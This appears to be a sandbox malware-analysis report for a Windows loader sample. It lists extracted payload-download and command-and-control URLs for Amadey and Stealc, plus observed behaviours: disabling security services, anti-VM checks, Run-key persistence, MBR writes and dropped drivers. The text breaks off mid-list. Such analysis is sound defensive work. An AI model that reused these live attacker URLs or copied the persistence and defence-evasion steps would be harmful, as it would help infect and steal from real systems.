Analysis
-
max time kernel
93s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
26/03/2025, 18:59
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250313-en
General
-
Target
2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
7ed4e1bef4390c523b41b8932ae245d9
-
SHA1
6a34c370e538ca02558b2b3f953351363faf4b13
-
SHA256
bd2990cee56bbb62bb263ccf3b5d0cd7760ec89cb31cc0f1fbe524af346fb7ca
-
SHA512
68cc639fc830fb12966cdb7f144df0a34cb4331890693d3790d80270d412ca3ffcb0d01693002df2a67832dd1ffda7bc8df3ee48b22f78b77441756a003ecb5a
-
SSDEEP
24576:iqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:iTvC/MTQYxsWR7a06
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/9120-35002-0x0000000000040000-0x0000000000492000-memory.dmp healer behavioral2/memory/9120-35003-0x0000000000040000-0x0000000000492000-memory.dmp healer behavioral2/memory/9120-35462-0x0000000000040000-0x0000000000492000-memory.dmp healer -
Healer family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Netsupport family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 13116 created 2596 13116 Exam.com 44 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c4ab00aec8.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 21 5540 powershell.exe 175 4640 powershell.exe 183 7092 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 5540 powershell.exe 4640 powershell.exe 7092 powershell.exe 6208 powershell.exe 6588 powershell.exe 364 powershell.exe 4328 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 14 IoCs
flow pid Process 35 4288 rapes.exe 113 4288 rapes.exe 175 4640 powershell.exe 41 4288 rapes.exe 119 4288 rapes.exe 119 4288 rapes.exe 119 4288 rapes.exe 119 4288 rapes.exe 21 5540 powershell.exe 183 7092 powershell.exe 30 4024 svchost.exe 83 4288 rapes.exe 83 4288 rapes.exe 26 4288 rapes.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\a674896e.sys 1220b1a7.exe File created C:\Windows\System32\Drivers\klupd_a674896ea_arkmon.sys 1220b1a7.exe File created C:\Windows\System32\Drivers\klupd_a674896ea_klbg.sys 1220b1a7.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 3724 takeown.exe 3844 icacls.exe -
Sets service image path in registry 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_a674896ea_mark\ImagePath = "System32\\Drivers\\klupd_a674896ea_mark.sys" 1220b1a7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_a674896ea_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_a674896ea_arkmon.sys" 1220b1a7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\a674896e\ImagePath = "System32\\Drivers\\a674896e.sys" 1220b1a7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_a674896ea_arkmon\ImagePath = "System32\\Drivers\\klupd_a674896ea_arkmon.sys" 1220b1a7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_a674896ea_klbg\ImagePath = "System32\\Drivers\\klupd_a674896ea_klbg.sys" 1220b1a7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_a674896ea_klark\ImagePath = "System32\\Drivers\\klupd_a674896ea_klark.sys" 1220b1a7.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c4ab00aec8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c4ab00aec8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation dBSGwVB.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation WLbfHbp.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation 11.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation dBSGwVB.exe -
Deletes itself 1 IoCs
pid Process 2664 w32tm.exe -
Executes dropped EXE 28 IoCs
pid Process 3768 TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE 4288 rapes.exe 6040 f73ae_003.exe 3496 7IIl2eE.exe 4952 tzutil.exe 2664 w32tm.exe 2712 c4ab00aec8.exe 7528 WLbfHbp.exe 12256 BIm18E9.exe 13116 Exam.com 6856 apple.exe 6048 11.exe 3292 11.exe 4260 742859a7.exe 7116 1220b1a7.exe 5896 rapes.exe 10748 dBSGwVB.exe 11436 bild.exe 11568 bild.exe 11996 kDveTWY.exe 12828 cbe532ddb7.exe 5492 TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE 3336 kDveTWY.exe 7848 dBSGwVB.exe 8144 bild.exe 3872 483d2fa8a0d53818306efeb32d3.exe 8252 bild.exe 8440 bild.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine c4ab00aec8.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\a674896e.sys 1220b1a7.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\a674896e.sys\ = "Driver" 1220b1a7.exe -
Loads dropped DLL 47 IoCs
pid Process 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 7116 1220b1a7.exe 11436 bild.exe 11436 bild.exe 11436 bild.exe 11436 bild.exe 11436 bild.exe 11568 bild.exe 11568 bild.exe 11568 bild.exe 11568 bild.exe 8144 bild.exe 8144 bild.exe 8144 bild.exe 8144 bild.exe 8252 bild.exe 8252 bild.exe 8252 bild.exe 8252 bild.exe 8440 bild.exe 8440 bild.exe 8440 bild.exe 8440 bild.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 3724 takeown.exe 3844 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat = "C:\\Users\\Public\\Netstat\\bild.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cbe532ddb7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10342650101\\cbe532ddb7.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10342660121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat = "C:\\Users\\Public\\Netstat\\bild.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat = "C:\\Users\\Public\\Netstat\\bild.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\2b6154e6-d58e-4ad5-b334-e7e691a719e2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{64eff226-89a5-4d48-b10a-3d34114edaeb}\\2b6154e6-d58e-4ad5-b334-e7e691a719e2.cmd\"" 1220b1a7.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: 1220b1a7.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 1220b1a7.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00080000000242ec-34085.dat autoit_exe behavioral2/files/0x000700000002431d-34893.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 11772 tasklist.exe 12008 tasklist.exe 5464 tasklist.exe 8672 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 3768 TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE 4288 rapes.exe 2712 c4ab00aec8.exe 5896 rapes.exe 5492 TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE 3872 483d2fa8a0d53818306efeb32d3.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 11996 set thread context of 12096 11996 kDveTWY.exe 231 PID 3336 set thread context of 1184 3336 kDveTWY.exe 256 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 742859a7.exe File opened (read-only) \??\VBoxMiniRdrDN 1220b1a7.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe -
Drops file in Windows directory 23 IoCs
description ioc Process File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\IstRepresentative WLbfHbp.exe File opened for modification C:\Windows\AdministratorNhs WLbfHbp.exe File opened for modification C:\Windows\ThinksMartin WLbfHbp.exe File opened for modification C:\Windows\ThoseTransit WLbfHbp.exe File created C:\Windows\Tasks\rapes.job TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\VeryBulk WLbfHbp.exe File opened for modification C:\Windows\MandateFlashing WLbfHbp.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\DollStriking WLbfHbp.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\FinancingPortable WLbfHbp.exe File opened for modification C:\Windows\SinghCooling WLbfHbp.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 9952 sc.exe 3556 sc.exe 3512 sc.exe 9024 sc.exe 9728 sc.exe 10064 sc.exe 1220 sc.exe 3232 sc.exe 9780 sc.exe 9800 sc.exe 10360 sc.exe 9584 sc.exe 10148 sc.exe 10612 sc.exe 8008 sc.exe 9852 sc.exe 10220 sc.exe 10396 sc.exe 10080 sc.exe 5344 sc.exe 7244 sc.exe 6024 sc.exe 9892 sc.exe 1548 sc.exe 10692 sc.exe 10004 sc.exe 7912 sc.exe 7956 sc.exe 9232 sc.exe 9648 sc.exe 10172 sc.exe 10316 sc.exe 10664 sc.exe 7520 sc.exe 7484 sc.exe 9700 sc.exe 10296 sc.exe 7204 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh 1220b1a7.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh 1220b1a7.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 12964 13116 WerFault.exe 144 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dBSGwVB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dBSGwVB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c4ab00aec8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempXPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BIm18E9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f73ae_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Exam.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 742859a7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WLbfHbp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bild.exe Key opened 